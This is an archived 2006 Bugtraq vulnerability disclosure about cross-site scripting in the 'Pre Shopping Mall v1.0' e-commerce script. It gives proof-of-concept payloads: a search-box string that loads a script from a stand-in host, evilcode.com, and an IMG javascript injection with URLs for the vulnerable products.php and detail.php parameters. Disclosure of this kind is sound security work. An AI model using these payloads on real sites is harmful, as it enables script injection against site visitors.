lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060524100210.15079.qmail@securityfocus.com> Date: 24 May 2006 10:02:10 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Pre Shopping Mall v1.0 Pre Shopping Mall Homepage: http://www.preprojects.com/emall.asp Description: PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy install and start selling your products. Very easy to installs and manage powerful administration. Receive payments either through Paypal or Authorize.net. Quickest solution for your online business. Effected files: search box. detail.php products.php Exploits & Vulns: XSS Vulnerabilities: The search and login box does not sanatize user input before generating it dynamically. This could cause XSS. For proof of concept just try putting this in the search box: '';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--" <XSS>=&{()} More XSS Vulns: For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')> http://www.example.com/emall/products.php?cid=[XSS] http://www.example.com/emall/detail.php?prodid=[XSS]